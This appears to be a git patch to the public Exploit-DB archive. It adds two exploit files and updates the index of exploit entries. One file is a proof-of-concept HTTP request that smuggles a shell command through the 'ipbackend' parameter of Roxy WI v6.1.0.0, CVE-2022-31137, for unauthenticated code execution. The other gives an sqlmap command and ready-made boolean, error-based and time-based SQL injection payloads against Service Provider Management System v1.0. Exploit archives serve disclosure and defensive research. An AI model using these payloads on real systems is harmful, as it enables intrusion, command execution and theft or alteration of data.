From 2b62bd319d40af12a8ce585dc9a423dc97ccea17 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Thu, 25 May 2023 00:16:26 +0000 Subject: [PATCH] DB: 2023-05-25 3 changes to exploits/shellcodes/ghdb Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute Service Provider Management System v1.0 - SQL Injection WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE Roxy WI v6.1.0.0 - Improper Authentication Control --- exploits/php/webapps/51481.txt | 24 +++++++++++++++++ exploits/php/webapps/51482.txt | 48 ++++++++++++++++++++++++++++++++++ files_exploits.csv | 6 +++-- 3 files changed, 76 insertions(+), 2 deletions(-) create mode 100644 exploits/php/webapps/51481.txt create mode 100644 exploits/php/webapps/51482.txt diff --git a/exploits/php/webapps/51481.txt b/exploits/php/webapps/51481.txt new file mode 100644 index 000000000..25c7722bd --- /dev/null +++ b/exploits/php/webapps/51481.txt @@ -0,0 +1,24 @@ +# Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute +# Exploit Author: Iyaad Luqman K +# Application: Roxy WI <= v6.1.0.0 +# Vendor Homepage: https://roxy-wi.org +# Software Link: https://github.com/hap-wi/roxy-wi.git +# Tested on: Ubuntu 22.04 +# CVE : CVE-2022-31137 + + +# PoC +POST /app/options.py HTTP/1.1 +Host: 192.168.1.44 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 136 +Origin: https://192.168.1.44 +Referer: https://192.168.1.44/app/login.py +Connection: close + +show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=";id+##&backend_server=127.0.0.1 \ No newline at end of file diff --git a/exploits/php/webapps/51482.txt b/exploits/php/webapps/51482.txt new file mode 100644 index 000000000..f2e22b8c9 --- /dev/null +++ b/exploits/php/webapps/51482.txt @@ -0,0 +1,48 @@ +# Exploit Title: Service Provider Management System v1.0 - SQL Injection +# Date: 2023-05-23 +# Exploit Author: Ashik Kunjumon +# Vendor Homepage: https://www.sourcecodester.com/users/lewa +# Software Link: https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html +# Version: 1.0 +# Tested on: Windows/Linux + +1. Description: + +Service Provider Management System v1.0 allows SQL Injection via ID +parameter in /php-spms/?page=services/view&id=2 +Exploiting this issue could allow an attacker to compromise the +application, access or modify data, +or exploit the latest vulnerabilities in the underlying database. + +Endpoint: /php-spms/?page=services/view&id=2 + +Vulnerable parameter: id (GET) + +2. Proof of Concept: +---------------------- + +Step 1 - By visiting the url: +http://localhost/php-spms/?page=services/view&id=2 just add single quote to +verify the SQL Injection. +Step 2 - Run sqlmap -u " http://localhost/php-spms/?page=services/view&id=2" +-p id --dbms=mysql + +SQLMap Response: +---------------------- +Parameter: id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP +BY clause (FLOOR) + Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECT +COUNT(*),CONCAT(0x7178717171,(SELECT +(ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: page=services/view&id=1' AND (SELECT 1072 FROM +(SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 9d9bbe31f..e3801d5e7 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -28713,6 +28713,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 39963,exploits/php/webapps/39963.txt,"Roxy Fileman 1.4.4 - Arbitrary File Upload",2016-06-16,"Tyrell Sassen",webapps,php,80,2016-06-16,2016-06-16,0,,,,,http://www.exploit-db.comRoxyFileman-1.4.4-php.zip, 46172,exploits/php/webapps/46172.txt,"Roxy Fileman 1.4.5 - Arbitrary File Download",2019-01-16,"Ihsan Sencan",webapps,php,80,2019-01-16,2019-01-16,0,,,,,http://www.exploit-db.comRoxyFileman-1.4.5-php.zip, 46085,exploits/php/webapps/46085.txt,"Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal",2019-01-07,"Pongtorn Angsuchotmetee_ Vittawat Masaree",webapps,php,80,2019-01-07,2019-01-07,0,CVE-2018-20526;CVE-2018-20525,Traversal,,,http://www.exploit-db.comRoxyFileman-1.4.5-php.zip, +51481,exploits/php/webapps/51481.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute",2023-05-24,"Iyaad Luqman K",webapps,php,,2023-05-24,2023-05-24,1,CVE-2022-31137,,,,, 50934,exploits/php/webapps/50934.txt,"Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)",2022-05-12,"Eren Gozaydin",webapps,php,,2022-05-12,2022-05-12,0,CVE-2022-28080,,,,, 6589,exploits/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - 'showtopic' SQL Injection",2008-09-26,0x90,webapps,php,,2008-09-25,2016-12-23,1,OSVDB-49317;CVE-2008-4736,,,,, 6591,exploits/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 - Insecure Cookie Handling",2008-09-27,Stack,webapps,php,,2008-09-26,,1,OSVDB-57330;CVE-2008-7028,,,,, @@ -29122,6 +29123,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 35197,exploits/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",webapps,php,,2014-11-12,2014-11-12,0,OSVDB-114661;OSVDB-114660,,,,, 45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comServerZilla_src.zip, 10938,exploits/php/webapps/10938.txt,"Service d'upload 1.0.0 - Arbitrary File Upload",2010-01-03,indoushka,webapps,php,,2010-01-02,,0,,,,,, +51482,exploits/php/webapps/51482.txt,"Service Provider Management System v1.0 - SQL Injection",2023-05-24,"ASHIK KUNJUMON",webapps,php,,2023-05-24,2023-05-24,0,,,,,, 4089,exploits/php/webapps/4089.pl,"SerWeb 0.9.4 - 'load_lang.php' Remote File Inclusion",2007-06-21,Kw3[R]Ln,webapps,php,,2007-06-20,2016-10-05,1,OSVDB-36324;CVE-2007-3358,,,,http://www.exploit-db.comserweb-0.9.4.tar.gz, 4696,exploits/php/webapps/4696.txt,"SerWeb 2.0.0 dev1 2007-02-20 - Multiple Local/Remote File Inclusion Vulnerabilities",2007-12-06,GoLd_M,webapps,php,,2007-12-05,,1,OSVDB-39220;CVE-2007-6290;OSVDB-39219;CVE-2007-6289;OSVDB-39218;OSVDB-39217,,,,, 9284,exploits/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusions",2009-07-27,GoLd_M,webapps,php,,2009-07-26,,1,,,,,, @@ -33719,7 +33721,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,,2021-06-11,2021-06-11,0,,,,,, 51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-03-29,0,CVE-2022-1565,,,,, 47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,, -51224,exploits/php/webapps/51224.py,"WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE",2023-04-03,BLY,webapps,php,,2023-04-03,2023-04-03,0,CVE-2020-25213,,,,, +51224,exploits/php/webapps/51224.py,"WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE",2023-04-03,BLY,webapps,php,,2023-04-03,2023-05-24,1,CVE-2020-25213,,,,, 51152,exploits/php/webapps/51152.txt,"WPForms 1.7.8 - Cross-Site Scripting (XSS)",2023-03-30,"Milad karimi",webapps,php,,2023-03-30,2023-03-30,0,,,,,, 39678,exploits/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,webapps,php,80,2016-04-11,2016-04-11,0,,,,,,http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt 51075,exploits/php/webapps/51075.txt,"WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities",2023-03-27,"Rafael Pedrero",webapps,php,,2023-03-27,2023-03-27,0,,,,,, @@ -34487,7 +34489,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 38738,exploits/python/webapps/38738.txt,"Plone - 'in_portal.py' < 4.1.3 Session Hijacking",2013-07-31,"Cyrill Bannwart",webapps,python,,2013-07-31,2015-11-17,1,CVE-2013-4200;OSVDB-95863,,,,,https://www.securityfocus.com/bid/61964/info 49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python,,2021-06-02,2021-06-02,0,CVE-2021-21337,,,,http://www.exploit-db.comProducts.PluggableAuthService-2.6.0.zip, 39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info -51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31125,,,,, +51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,, 51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31126,,,,, 51228,exploits/python/webapps/51228.txt,"Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31161,,,,, 50318,exploits/python/webapps/50318.py,"Sentry 8.2.0 - Remote Code Execution (RCE) (Authenticated)",2021-09-22,"Mohin Paramasivam",webapps,python,,2021-09-22,2021-09-22,0,,,,,,